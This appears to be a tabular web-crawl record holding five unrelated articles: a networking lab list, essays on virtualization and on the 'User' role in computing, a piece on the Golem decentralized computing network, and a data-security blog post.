text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
The following activities provide practice with the topics introduced in this chapter. The Labs and Class Activities are available in the companion Routing Protocols Lab Manual (978-1-58713-322-0). The Packet Tracer Activities PKA files are found in the online course.
Class Activity 22.214.171.124: Do We Really Need a Map?
Class Activity 126.96.36.199: We Really Could Use a Map!
Lab 188.8.131.52: Mapping the Internet
Lab 184.108.40.206: Configuring Basic Router Settings with IOS CLI
Lab 220.127.116.11: Configuring Basic Router Settings with CCP
Packet Tracer Activities
Packet Tracer Activity 18.104.22.168: Using Traceroute to Discover the Network
Packet Tracer Activity 22.214.171.124: Documenting the Network
Packet Tracer Activity 126.96.36.199: Configuring IPv4 and IPv6 Interfaces
Packet Tracer Activity 188.8.131.52: Configuring and Verifying a Small Network
Packet Tracer Activity 184.108.40.206: Investigating Directly Connected Routes | <urn:uuid:4d8af924-9a7f-4de2-b233-e8265b8b6857> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=2180208&seqNum=12 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00487.warc.gz | en | 0.669428 | 265 | 2.5625 | 3 |
During the past few decades, CIOs have stood at the center of one of the great technological revolutions in history: the replacement of the physical atom by the computational bit as the medium of commerce and culture. The profession might be forgiven for thinking that nothing is left for the next generation but tinkering. What could compare with a transition like that?
Actually, something almost as big might be coming over the horizon: the replacement of the bit with the virtual bit. Virtualization is the substitution of physical computing elements, either hardware or software, with artificial impostors that exactly replicate the originals, but without the sometimes inconvenient need for those originals to actually exist. Need a 1 terabyte hard drive, but only have 10 100GB drives? No problem, virtualization software can provide an interface that makes all 10 drives look and act like a single unit to any inquiring application. Got some data you need from an application you last accessed in 1993 on an aging MicroVAX 2000 that hit the garbage bin a decade ago? A virtual Digital VMS simulator could save your skin.
Stated like that, virtualization can sound like little more than a quick and dirty hack, and indeed, for most of the history of computing, that is exactly how the technique was viewed. Its roots lie in the early days of computing, when it was a means of tricking single-user, single-application mainframe hardware into supporting multiple users on multiple applications. But as every aspect of computing has grown more complex, the flexibility and intelligence that virtualization adds to the management of computing resources have become steadily more attractive. Today it stands on the lip of being the next big thing.
Raising the Dead
The Computer History Simulation Project, coordinated by Bob Supnik at SiCortex (see “Immortality for Aging Systems”), uses virtualization to fool programs of historical interest into thinking that they are running on computer hardware that vanished decades ago. Supnik’s project has a practical end as well: Sometimes old systems are so embedded in the corporate landscape that they must be kept running. If the real hardware is unavailable, the only way to keep the old machines running is to virtualize them.
In a more contemporary example of the power of virtualization, about three years ago J. R. Simplot, a $3 billion food and agribusiness company in Boise, Idaho, found itself in a phase of especially rapid growth in server deployments. Of course, with rapid growth comes the headache of figuring out how to do everything faster. In this case, the company’s IT center concluded that their old server procurement system had to be accelerated.
Servers, of course, are pieces of physical equipment; they come with their own processing, memory, storage resources and operating systems. What the Simplot team did was use virtualization tools from VMware, a virtual infrastructure company, to create software-only servers that interacted with the network just like hardware servers, although they were really only applications. Whenever Simplot needed another server it would just flip the switches appropriate to the server type (Web, application, database, e-mail, FTP, e-commerce and so on). From that point, an automated template generated the virtual machine on a specific VMware ESX host machine.
According to Tony Adams, a technology analyst at Simplot, there were gains all across the board. The time to get a new server up and running on the system went from weeks to hours or less. Uptime also increased, because the servers were programs and could run on any supported x86 hardware anywhere. If a machine failed or needed maintenance, the virtual server could be quickly moved to different hardware.
Perhaps most important were the gains in utilization efficiencies. Servers are built for specific roles. Sometimes demand for a particular role is in sync with available resources, but usually it isn’t. In the case of “real” servers, if there is a mismatch, then there is nothing that you can do about it; you’re stuck with what you have. If you end up with an average utilization rate of 10 percent per server, so be it. (The need to provide for peak demand makes the problem worse, and utilization can often be far below even 10 percent.) Low utilization means IT is stuck with unnecessary maintenance issues, security faces unnecessary access issues (they have to worry about protecting more machines), and facilities must deal with unnecessary heat and power issues.
Virtualization fixes these problems. The power to design any kind and number of servers that you like allows you to align capacity with load continuously and precisely. In the case of Simplot, once Adams’s servers turned virtual, he was able to deploy nearly 200 virtual servers on only a dozen physical machines. And, he says, typical CPU, network, disk and memory utilization on the VMware ESX boxes is greater than 50 percent—compared with utilization of around 5 percent on dedicated server hardware.
Virtualization also makes disaster recovery planning simpler, because it allows you to write server clusters appropriate to whatever infrastructure you have on hand. As Adams points out, conventional disaster recovery schemes force you to have an exact clone of your hardware sitting around doing nothing. “But personally, what I really like,” he says, “is the remote manageability. I can knock out new [servers] or do repairs anywhere on the Net, without even going to the data center.”
Adams wants one machine to look like many machines, but it is just as possible to virtualize the other way: making many machines look like one. Virtualization underlies the well-known RAID storage tricks that allow many disks to be treated as one huge drive for ease of access, and one disk to be treated as many for the purpose of robust backup. Another prime use for virtualization is development. The hardware world is growing much more complex all the time: Product cycles are turning faster, the number of device types is always rising, and the practice of running programs over networks means that any given program might come in contact with a huge universe of hardware. Developers can’t begin to afford to buy all of this hardware for testing, and they don’t need to: Running products on virtualized models of the hardware allows for quality assurance without the capital expense. Virtualizing the underlying hardware also gives developers far more control. Peter Magnusson, CTO of Virtutech, a systems simulation company in San Jose, Calif., points out that you can stop simulated hardware anywhere you like, any time you want to investigate internal details.
During the next year or two, virtualization is on track to move from its current success in storage, servers and development, to networks and data centers. So CIOs will then be able to build software versions of firewalls, switches, routers, load balancers, accelerators and caches, exactly as needed. Everything that was once embodied in cards, disks and physical equipment of any kind, will be organized around a single point of control. If virtualization vendor promises materialize, changes that once were out of the question, or that at least would have required considerable man-hours and operational risk, will be done in minutes, routinely.
What those changes will mean is very much a topic for current discussion. For instance, all the new knobs and buttons virtualization provides will raise issues of policy, because it will be possible to discriminate among classes of service that once had to be handled together. You will, for instance, be able to write a Web server that gives customers who spend above a certain limit much better service than those who spend only half as much. There will be huge opportunities for automation. Infrastructure may be able to reconfigure itself in response to changes in demand, spinning out new servers and routers as necessary, the way load balancing is done today. (Certainly IBM et al. have been promoting just such a vision of the on-demand computing future.)
Virtualization examples so far have all been hardware-centric, because the inherent inflexibility of hardware means the elasticity advantages of virtualization are greater than with software. However, virtualization can work anywhere in the computing stack. You can virtualize both the hardware and the operating system, which allows programs written for one OS to run on another, and programs written for a virtual OS to run anywhere (similar to how Java maintains its hardware independence through the Java Virtual Machine).
Quite possibly the growth of virtualization predicts a deep change in the responsibilities of CIOs. Perhaps in the not-too-distant future no CIO will ever think about hardware: Raw physical processing and storage will be bought in bulk from information utilities or server farms. Applications will be the business of the departments or offices requiring them. The center of a CIO’s job will be the care and feeding of the execution environment. The very title of CIO might vanish, to be replaced, of course, by CVO.
Taking It All In
In that world, virtualization could graduate into a full-throated simulation of entire systems, the elements of which would not be just computing hardware, as now, but all the motors, switches, valves, doors, engines, vehicles and sensors in a company. The model would run in parallel with the physical company and in real-time. Where now virtualization is used for change management, disaster recovery planning, or maintenance scheduling for networks and their elements, it would in the future do the same for all facilities. Every object or product sold would come with a model of itself that could fit into one of these execution environments. It would be the CVO’s responsibility to make sure that each company’s image of itself was accurate and complete and captured the essentials. And that would not be a virtual responsibility in the least.
Fred Hapgood is a freelance writer living near Boston. He can be reached at firstname.lastname@example.org. | <urn:uuid:9eb38711-5ea3-4ec0-bda8-519fa22962ed> | CC-MAIN-2022-40 | https://www.cio.com/article/252636/virtualization-the-virtues-of-virtualization.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00487.warc.gz | en | 0.948148 | 2,039 | 2.828125 | 3 |
…when everything becomes a computer, there will be no more computers
Starting Premise. 1 Let us agree, for sake of a thought experiment, that a Human represents the ultimate Machine potential. In other words, every Machine that a Human creates is a subset of Human capabilities. Yes, a Machine may be stronger, faster, lighter, more durable, et cetera than a Human, however, the most capabilities with which a Human will be able to endow a Machine are those of the Human. For the reader who wants to debate about Human flight, consider that the Human is capable of flight albeit extremely short survivable distances.
The Design Optimization complement to Human aspiration is a profoundly symbiotic form of Artificial Intelligence.
Back to the Future Past. In 1867, American inventor Christopher Latham Sholes struggled with improving the performance of the typewriter. If commonly used letter pairings such as S-T were struck too quickly, the mechanical linkages that transmitted the letter key selection to the striking of that letter on paper would get jammed. The typist had to stop Work, turn attention away from source material, turn attention to the typewriter, untangling jammed keys, return attention to the typewriter keys, reset their fingers, check that the typewriter carriage was in the proper spot, turn their attention to the source material, and resume Work.
The speed of the typewriter (a Machine) was inhibited by the faster speed of the Worker. Sholes’ solution to this problem was to separate the commonly used letter pairings and place the most frequently used keys on the left side of the layout. This solution slowed the Worker so that the Machine could perform at its best. Unfortunately, Human obsession with technology enables Machines to transform and evolve much faster than the Human being itself evolves. Thus, the speed of the Machine today is inhibited by the slower speed of the Worker.
“Those who cannot remember the past are condemned to repeat it.” Reason in Common Sense – George Santayana, 1905. In 2021, while computing Machines operate at speeds greater than that of Human thought, we must revisit System Solution design to avoid unintended consequences arising from lack of foresight.
CognitiveVirtual by SwissCognitive
Global Online AI Event Series
07. April 2021
Event Recording – Panel Discussion – With Input from Stewart Skoma
Global Online AI Event Series
07. April 2021
“Those who cannot remember the past area condemned to repeat it.”
Reason in Common Sense, George Santayana, 1905
“User” Anomaly. Other than with respect to most electronic Machines (e.g., computers, tablets, smartphones, et cetera), the User role does not occur in Humanity (excepting for references to consumers of recreational drugs). Drivers drive cars. Passengers ride in cars, in buses, on boats, on planes. People wear clothes, sleep on mattresses, swing golf clubs, hit golf balls, swim in pools, ride bicycles, enjoy entertainment, et cetera. Children play games, play sports, learn math, learn spelling, compose essays, read books, et cetera.
It is natural to discuss a homemaker using a stove, pots, and pans to make a meal and downright awkward to think of a User using a stove, pots, and pans… “User”, while necessary at the outset of the computer industry, should have become passé not long after Donald A. Norman’s 1999 publication of The Invisible Computer.
Please take note: When your child or grandchild asks for the iPad, they say: “May I play with/watch the iPad”. They do not say may I Use it and (most important) they will grow to never Use computers in the future. Just as when if everything were the color blue, there would be no color blue; when everything becomes a computer, there will be no more computers. As goes the computer, so goes User.
…when everything becomes a computer, there will be no computers.
In the context of Machines as subsets of the Human, it is fair to accept that most everything a Human may want to accomplish with a computing Machine was described by the Dr. Vannever Bush in his July 1945 Atlantic Monthly article As We May Think. One can make the case that Humanity has only now, in the year 2021, recently delivered on the vision of Dr. Bush. Further progress may be hampered by Humanity getting in its own way.
As We May Do. ‘Humanity getting in its own way’ is mistakenly accepting the User role as fundamental – that ‘User’ is doing something [as in the performance of Work = (Force x Distance) + (Thought x Time)] more than retrieving data from one Machine process and feeding it into another Machine process.
Computers are Machines. A Machine is an invention created by Humans to make work easier by multiplying the effect of Human effort. When creating a system solution design comprising Machines that execute management science algorithms (e.g., Double-Entry Bookkeeping, Linear Programming, Off-Set Leadtime Planning, et cetera), placing the non-Value-Add User role at its center ensures the automation will never run faster than the slowest User role being fulfilled by a Human.
Unfortunately, as Humanity continues relentlessly advancing technology, what many Users today actually do is stare at refracted light (sometimes it is reflected as in the case of transmissive display technology) or listen to synthesized speech and populate data (through myriad input mechanisms) that cause a Machine process to take the next programmed step in emitting refracted light and/or synthesizing speech.2
What is fundamental is that which a Worker does, as in Work = (Force x Distance) + (Thought x Time). It is what a Worker does and not how they spend time that is fundamental and needs to be elevated in the revisiting.
System Solutions must be revisited knowing that the same Management Science and Physical Science has been automated both upstream, downstream, and throughout extended enterprise system solutions. It comes as no surprise that the “Outputs” of one enterprise look a lot like the expected “Inputs” of another enterprise. What becomes a surprise is when there is a tremendous mismatch between enterprise-to-enterprise systems especially in the post Y2K era. Chances are good that an IT vendor and/or IT Employee convinced one or more Workers in one or both enterprise that they are so special that unique software must be written for them.
Back to the Future. Enabling Machines to automatically create Machine automation (i.e., computers programming computers) may require a breakthrough approach such as the movement from 3rd Person Design for 1st-Person Execution to the 2nd-Person Design + Execution. This new design perspective may then enable the conceptualization of the “Mind” of the first Machine interacting within itself and its environment conceptualizing and realizing a “Mind” of a second Machine, and so on.
Time out & Back up. Before attempting to wrap your head around the above paragraph, let us agree that, for Machine automation to achieve its potential, there would need to be a change; that something is broken and needs to be fixed. The old saw says, ‘The first step in a cure is accepting that you are sick’. So, what is wrong with what we are doing with computers today that precludes advancement, why is it that way, and what do we need to do differently?
Admitting Sickness. Anecdotally, while information technology has advanced exponentially, the increase in marginal productivity from the investment in information technology has been in decline. In other words, the same or more investment of Time + Talent + Treasure into exponentially advancing information technology is met with smaller and smaller improvements in outcome.
In 2021, every Design Engineer has multiple Computers (e.g., design workstation, notebook computer, tablet, smartphone, et al) at their disposal each of which are over 1,000,000 times the power of the single computer they had in 2001. New product development success has not advanced at the rate of the empowering underlying Machine automation.
With an overabundance of computers, most product development continues progressing incrementally with the success of new product development initiatives being not that much greater than the success of a Startup. It is no surprise that bright, energetic, talented engineers abandon what truly are exciting projects in large enterprise projects, throw caution to the wind, and become entrepreneurs.
Let us assume this flagging growth in productivity in the face of exponentially growing technology resource is true and that it is a problem. What is the Root Cause of this paradox? Simply stated, the Root Cause of today’s declining marginal returns in productivity and operational efficiency from investment in Information System Solutions is failure of Computer Science to implement Information Science for Optimization of how we Live – Work – Play. This failure will be overcome by establishing and working from a new perspective.
The rise of User. Fifty years is not a very long time in the history of Humanity. In the early 1970s, long before any talk of computer User Experience or Human-Machine Interface (HMI) most all HMI was punched cards and paper tape data input resulting in delivery of fan-folded green bar printed paper information output.
Green bar report production, sorting, delivery, storage, and archiving became an around-the-clock operation within each company that implemented computer automation earning itself a newly established functional department named Data Processing or DP for short.
DP initially served business functions directly responsible for: keeping track of money (Accounting), spending money on Workers (Payroll), and spending money on things (Materials).
Accounting, Payroll, and Materials Workers became the primary consumers of the output. While these Workers certainly used the DP department output, their primary role remained Accounting, Payroll, and Materials. Each of these Workers was not a computer user or User for brevity.
Humans continued advancing computing Machines enabling the concept of online transaction processing (OLTP) or being “online” with the computer. Through typewriter-style keyboards, stylus, light pen, microphone, camera, mouse, joystick, et cetera humans fed data input to the Machines. Through video display terminals, speakers, printers, and plotters humans consumed the information output from the Machines. Data Processing or DP evolved to become Management Information Systems or MIS.
The field of Management Science (initially pioneered in The Principles of Scientific Management – 1911, by Frederick Winslow Taylor) reached its zenith in the mid-1960s with the work of George Plossl and Oliver Wight memorialized in their seminal 1967 work: Production and Inventory Control – Principles and Techniques. Combined with Mark’s Standard Handbook for Mechanical Engineers – 1916-2016 we have algorithms for the molding of natural resources (“Physical Science”) to produce tools and Machines and the principles and techniques to plan, schedule, produce and deliver (“Management Science”) volumes of these tools and Machines. Imbuing Machines with these algorithms, principles, and techniques is the provenance of Information Science.
Information Science took significant steps forward when talented IBM Information Science professionals in 1973 published IBM COPICS – Communications Oriented Production & Information Control System serving as a Storyboard, External Design, and Information Model to realize automation of Plossl & Wight Management Science.
Proliferating User. IBM lore holds that founders of SAP SE were authors of essential COPICS system modules. These IBM Germany professionals saw the creation of Financial Accounting and Back-Office automation programs 3 as an opportunity that they could not pass up. Unfortunately, COPICS and most every other attempt to apply Computer Science to Management Science to create Information System Solutions were a product of systems engineers steeped in 1970s foresight. COPICS and all other seminal work in OLTP did not imagine that computing technology would ever evolve to enable the actual product being produced through a manufacturing process to monitor and report on its own state and condition.
In Working to realize IBM COPICS and myriad other OLTP system solution offerings, wherever the system designers encountered a capability that could not be performed by a Machine, they inserted a Human Worker in the User role. The User role itself is a non-Value-Add role (versus a Value-Add or Cost-Add roles of Value Chain definitions) created because humanity did not yet know what it did not know in the continuously advancing Computer Science & Information Science symbiotic relationship. Sadly today, in most cases in the year 2021, the User role persists as a vestige of early Computer Science challenges enabling one Machine (i.e., Computer) to communicate with another Machine.
Throughout the 1980s-1990s, Computer Science continued its advancement producing reentrant, multi-tasking enabled OLTP offerings for multi-threaded concurrent multiple input-output multi-programming models that would facilitate the realization of the COPICS and similar pioneering efforts of the period.
MIS proliferated throughout most all businesses with green bar reports and OLTP as its production. MIS employees would show up at the Accounting, Payroll, and Materials offices with a video display terminal (VDT) and keyboard, plop it on the Worker’s desk and say: “Use this and you will not have to wait as long for your reports!”.
A very subtle transformation began with the introduction of an additional role being filled by the Accounting, Payroll, and Materials Workers: User. MIS continued to advance with capabilities enabled for most every functional role within a company. Most every Worker began to take on this additional User role.
Humanity almost imperceptibly assumed this computer-related additional User responsibility, taking on the role of feeding the Machines and distributing the Machine output that had formerly been held by MIS. Most every Worker became a User. Since every Worker is not a manager, MIS renamed itself with the more universal designation of Information Technology or IT.
Systems Solution Perspective. Complete end-to-end IT system solutions were developed, IT careers were created, and books were written. Academia created undergraduate, graduate, and post-graduate curriculum feeding what became known as the IT Industry with workshops, seminars, and conferences. Throughout all this growth and evolution, attention transitioned from the Value-Add Worker role to the non-Value-Add User role to the point that the IT Industry primarily monetizes its offerings based on the number of Users versus value delivered.
Unfortunately, few readers of Donald A. Norman contributions to 1986 User Centered System Design: New Perspectives on Human-Computer Interaction may have read Norman’s complete works on design (not least of which is 1999, The Invisible Computer). It is likely that a very small minority read any more than the first chapter of any of Norman’s works anecdotal estimates being that less than 10% of non-fiction readers continue reading past the first chapter.
Unintended Consequence of User-Centered Systems Design. With a Systems Solution perspective and armed with seminal works such as User Centered System Design: New Perspectives on Human-Computer Interaction, Donald A. Norman & Stephen W. Draper, 1986, emphasis was thrust upon “User Experience” with IT Employees altogether bypassing methodical, rational product planning and instead rushing out to the User (‘Worker’) and asking them what they need.
The Worker never considers themselves to be a User. Workers are hired to fulfill a Role and, in doing so, earn and are paid wages, in other words, to do a job. What the Worker needs is #1 to be left alone to do their job, #2 a sense of security in their job, and #3 opportunity for growth. Since the IT Employee has already violated #1, the Worker focuses attention on #2 while hoping for #3. The result of the IT Employee – to Worker interaction is the Worker/User answers the IT professional’s request by telling them that they need something new and different from what they have.
This begins mutually beneficial co-dependent relationships between individual IT Employees and individual Workers that, unfortunately, serve as a detriment to the overall good of the company. To satisfy one another’s personal professional interests, they convince one another that what the User is doing is so special and so unique that it requires a special and unique IT solution.
IT vendors (the ones selling off-the-shelf System Solutions) thrive off this IT Employee-Worker dynamic as it creates customization of their off-the-shelf offerings making it very difficult to ever replace the solution. The IT Employee, the User (i.e., Worker), and IT vendor created a dependence upon them, individually and collectively going forward. Unfortunately, IT vendors, IT Employees, and Workers retire and expire, and the company suffers what could be operationally catastrophic disruption.
The IT vendor, IT Employee and Worker co-dependency holds the system solution potential hostage until one or more of these actors retires and/or expires.
2000s – Today
Fear is a Powerful Motivator. In anticipation of “unknown unknowns” wreaking havoc throughout Humanity at the turn of this last millennium, beginning in the late 1990s, most all company IT systems were wholesale replaced with non-Y2K 4 problem alternatives. Myriad legacy systems held hostage by the IT Employee – Worker co-dependence were simply tossed out and replaced with new IT vendor offerings immediately seeking to institute the IT vendor – IT Employee – Worker co-dependency. Unfortunately, many succeeded.
Variants of Sameness. OLTP System Solutions share the same lineage. Because of the Y2K wholesale replacement of the legacy OLTP offerings with a few IT vendor offerings, the common lineage is much more highly concentrated. All the OLTP System Solutions share the same Management Science and Physical Science heritage and today most all share the same or similar IT software base. With respect to these systems, 15th century double-entry bookkeeping is the backbone – there is a place for everything, and everything needs to be put in its place – wash, rinse, repeat. It should come as no surprise that Machines are able to learn process and then repeat the process of how companies operate.
RPA: The New QWERTY. In the year 2021, Robotic Process Automation (RPA) is on its rise within the field of Artificial Intelligence (AI). A simple definition of RPA is having a computer learn from basic, repetitive tasks performed by a User so that the computer (a Machine) can perform the same User task. After the nearly 50 years of obsession over “User”, this non-Value-Add role will be subsumed within Machine automation. It does seem fitting that the Machine should assimilate the function of exchanging data between Machines. Are we though creating another QWERTY keyboard? Since the system solution was purportedly developed as “User Centric”, would it not be prudent to step back and revisit system solutions making these Work and Worker Centric?
Solution: Move to the 2nd Person. The cure – the way to break the Information Technology Industry out of its malaise – is simple. A “User”-centric approach of Information System Solution design has the design of a solution accomplished in the 3rd Person with the intent of a Worker employing the product in the 1st Person. Worker-Centric design, where the Machine performs as an enhancement to the Worker must be accomplished from a 2nd Person perspective (in the spirit of Free Indirect Speech style).
There are few noteworthy novelists of acclaim writing in the Free Indirect Speech style, the most being James Joyce with the easier work to consume being his 1916 A Portrait of the Artist as a Young Man.
“History, Stephen said, is a nightmare from which I am trying to awake.”
A Portrait of the Artist as a Young Man,
James Joyce, 1916
2nd Person perspective is that wherein the Designer/Developer is immersed directly within the context of the Information System Solution Execution. Unlike the traditional history-biased 3rd Person perspective from which a Worker employs a product in the 1st Person perspective, the 2nd Person focus is on the present and the future. 3rd Person perspective enjoys the benefit of hindsight – learning from experience. Unfortunately, too may IT Workers and IT vendors confuse prediction (what the future will be) with forecasting (what the future should be). It is this “rearview-mirror forecasting” that results in tremendous misses in prediction. Leaning so heavily on historical data for predicting future-history – as most everyone does – is equivalent to declaring: “My, what a wonderful future you have behind you!”
Design Optimization is Amid the 2nd Person Vanguard. Machines assisting Humans in design – formulating, executing, and learning from executed plan results – is the nature of AI – Artificial Intelligence realized through Engineering Design Optimization. Computational algorithms and methodologies applied to design enables engineers to feed their design to Machines executing powerful optimization engines. Engineering Design Optimization frees the engineer to focus on design needs and desired outcomes.
Design Engineering Optimization, Machines – computers and algorithms – enables Workers to create more economically and ecologically-responsible designs all while consuming less resources. This virtuous cycle can be extended from optimized design-to-optimized planning-to-optimized execution and demands we revisit Enterprise System Solutions and the non-Value-Add User role.
The Design Optimization complement to Human aspiration is a profoundly symbiotic form of Artificial Intelligence.
For purpose of this narrative, we will not consider the post-Singularity Machine-Enhanced Human of Raymond Kurzweil fame.
2 Yes, the reader may take exception to the above and possibly use fully immersion Virtual/Augmented/Mixed-Reality (VR/AR/MR) as examples – In 2021, these are predominately point solutions and not System Solutions or (as is the dominant forms) serving Gamers, not Users.
3 General Ledger, Accounts Payable, Payroll, (GLAPPR) & Billing, Inventory Control, Accounts Receivable, Sales Analysis (BICARSA)
4 For those unfamiliar, IT software developed prior to the Year 2000 (Y2K) in many cases represented the year as two digits (e.g., 1999 = ‘99’). Ambiguity arose when the year turned to 2000 as the Machine (i.e., Computer) did not know whether ‘00’ represented 1900, 2000, 1800, 1700, et cetera. This Y2K “glitch” required software to be rewritten to resolve the ambiguity and similar issues.
About the Author:
Stewart Skomra is CEO of OmniQuest™. For over 35 years Stewart has driven New Product and New Market Development Computer-Aided Design & Computer-Aided Manufacturing, Machine-to-Machine/IoT – Internet-of-Things, Supply-Chain Management, Auto-ID, and Wireless Technologies. From Blue-Chips including IBM, Intel, Qualcomm, and Trimble Navigation through multiple startups, he has led development initiatives serving industries including manufacturing, construction, distribution, transportation & logistics, wholesale & retail, consumer packaged goods, along with finance, insurance, healthcare, and multiple energy fields.
CognitiveVirtuals are regular worldwide-reaching online events bringing dozens of global AI leaders and experts together to share their views, experiences and expertise in the development of AI to the benefit of business and society. These 3 hour-long events are transparently addressing the development of cognitive technologies – including successes and challenges – while reaching and connecting a global online community of over ½ million followers.
All the sessions and formats are strictly content-driven with a non-sales approach, allowing focused and open discussions with content only. These events provide not only a platform to brainstorm and network but also to position experts, leaders, organisation, research developments, the current status and future outlook of AI.
Check out our upcoming CognitiveVirtual HERE | <urn:uuid:b7035ef8-d9c7-4978-9ad9-b8494da56955> | CC-MAIN-2022-40 | https://swisscognitive.ch/2021/04/23/ai-demands-workers-stop-being-used/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00487.warc.gz | en | 0.932493 | 4,995 | 2.9375 | 3 |
Blockchain technology already underpins some of the most impressive creations of the modern world, and cryptocurrencies have evolved into powerful tools for investors.
But here’s the deal:
This technology is not all about building wealth or making it easier for people to create, sign and enforce contracts without the need for a lawyer. Blockchain and the cryptocurrency Ethereum are being used to build the world’s first decentralized supercomputer, Golem Network.
In this blog, I’m going to show you how Golem is different from any other supercomputer out there and why it’s something you should keep in your radar.
Introducing the Golem Network (GNT)
Called variously the Golem Network, the Golem Project, and the Golem Supercomputer, but most often referred to simply as Golem, this development marks the first attempt at creating a worldwide, decentralized supercomputer.
This supercomputer can deliver benefits to virtually anyone, anywhere on the planet. Golem already exists, although the network remains in its infancy, but what does it actually do? Is it really a supercomputer?
Golem is a supercomputer, but not in the traditional sense as shown in the above image. It is a network of decentralized computers that rent out computing resources in exchange for money.
To answer the second question first, no, Golem is not a supercomputer, at least not in the traditional sense. Instead, it’s more closely related to a cryptocurrency mining network.
What does this mean?
Golem harnesses the power of its constituent machines to complete tasks and reach goals.
According to Golem’s official website, “Golem is an open source, decentralized supercomputer that anyone can access. It is made up of the combined power of users’ machines from PCs to entire data centers.”
What are those goals? What’s it supposed to do?
Once more, we turn to the official website. “Golem creates a decentralized sharing economy of computing power and supplies software developers with a flexible, reliable and cheap source of computer power.”
According to a blog post written by Eddy Azar, once a member of the Golem team but no longer, the supercomputer will have very wide-ranging impacts. It will affect things like the ability to complete scientific research and the speed of finishing that research.
It has already affected the field of graphics rendering and is now being investigated for its use in artificial intelligence and machine learning. Golem will impact the world of data analysis, as well as cryptocurrency mining.
Now that we know what Golem is and the principles it’s based on, let us look at how Golem works.
How Does Golem Work?
Golem works like any other token in most ways. It operates on the Ethereum network and is built to essentially settle payments between providers, software developers, and others.
Golem is a decentralized network built on Ethereum, which is used to settle payments between developers and providers.
It’s about sharing computing power and network resources without worrying about who’s on the network, or whether those resources have been paid for.
Golem takes the traditional world of computations and turns it on its head. In most instances, whether we’re talking about a home PC or a server in a data center, resource use and computation affect the entire system.
Heavy computation creates a massive draw on power and processing capabilities, slowing the system to a crawl in some cases.
With Golem, that doesn’t happen. According to the Golem Network’s official website, “all computations take place in sandbox environments and are fully isolated from the hosts’ systems.”
Let us now move to the next section, where we look at some of Golem’s test cases.
Golem Network Use Cases
At the time of this writing, Golem only has a single, official use case, which is CGI rendering. Rendering three-dimensional objects and then animating them requires a significant amount of computation power and resources.
Golem’s main and only use case as of this writing is rendering CGIs.
With Golem, that is not the case, as the system can distribute the processing required across the entire network. This dramatically speeds up the entire process, while allowing requesters to set their own prices for rendering work.
And that’s not all...
Machine learning is a second use case that is currently being pursued, but the team heading up Golem says, “we are already in the process of integrating a variety of new use cases to Golem in cooperation with our business and technological partners.”
In the end, Golem might not be a supercomputer in the classical sense, but it does deliver vastly improved computation power and has implications for virtually every industry on the planet. | <urn:uuid:9913b131-18a1-4ad3-ad1b-d2b861279ada> | CC-MAIN-2022-40 | https://www.datacenters.com/news/how-the-golem-network-turns-the-idea-of-the-supercomputer-on-its-head | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00487.warc.gz | en | 0.934432 | 1,005 | 2.828125 | 3 |
Secure Data Protection
June 06, 2022
Contributed by James Miller, Associate Penetration Tester, DOT Security.
What is data security? In modern business, it is about securing critical information from getting into the wrong hands and ensuring all your company, employee, and customer data. Data breaches can have a devastating impact on businesses, especially those that handle sensitive information every day.
Read on to learn more about data security for businesses and why having a strong cybersecurity strategy is important in protecting that information.
Data security is defined as “the process of maintaining the confidentiality, integrity, and availability of an organization’s data in a manner consistent with the organization’s risk strategy,” by the National Cybersecurity Center of Excellence (NCCoE) brand of the Nation Institute of Standards and Technology (NIST).
This can happen in 3 stages: before, during, and after an incident takes place.
Before the incident: confirm that the security architecture and response plan are in place
During the incident: ensure the organization detects and responds appropriately
After the incident: verify that a plan is in place with the ability to recover effectively and efficiently
The method by which this data was stored has changed over the years as well. From the humble beginnings of handwritten documents stored inside a file cabinet to data files on hard drives to the current cloud storage such as Microsoft’s OneDrive and Google’s Google Drive.
As technology has evolved, the policies and procedures were forced to keep up with cybercriminals attempting to steal sensitive data. This is now known as Data Loss Prevention.
When data was stored in paper documents, the security process started with locked file cabinets. Later, obsolete documents were shredded (and then upgraded to cross shredding) to prevent documents from being stolen from the company garbage. At times, even the data disposal location was secured.
As technology advanced to storing data on hard drives, new ideas were needed. One of the first ideas implemented was file permissions, which allows only authorized people to view files. File encryption emerged next, which made data unintelligible without a cipher to decrypt it.
As mobile technology surfaced, the adoption of biometrics, using physiological data to open or access files, increased. Most recently, cloud technology allows data to be stored at a data center via a third-party provider.
Understanding how data security works and its importance is vital for businesses in today's digital environment, regardless of size and scale.
About 52% of breaches are from a malicious attack, which had a combined direct and indirect average cost of $4.27 million.
Besides the obvious pitfalls associated with losing critical business data, a data breach can result in many other costs, including:
Loss of production
Company trust erosion
Systems locked down with attackers demanding payment to remedy it (ransomware)
Stolen proprietary data like a blueprint or schematic that is in development or production
Possible fines for HIPPA violations to companies in the healthcare industry
Stolen company, customer, or employee data resulting in fraud or identity theft using stolen Personally Identifiable Information (PII)
Managed security services providers (MSSPs) like DOT Security offer a solution to help in all 3 stages: before, during, and after.
It begins with a Risk Audit to check a company’s current security situation. In addition to the risk audit, a Gap Analysis is often performed by compliance experts to determine if a company is still compliant with the necessary government regulations.
When both are done, cybersecurity specialists review the findings to determine the best course of action, including the protocols, software, best practices, and training necessary for your business to stay secure and protect its most valuable data, such as:
Access management to control who can access certain information
Encryption to secure who can view data and protect it during transfers and storage
Endpoint security to secure devices accessing the business network
Awareness training to help your staff understand cyberattacks and how to spot them
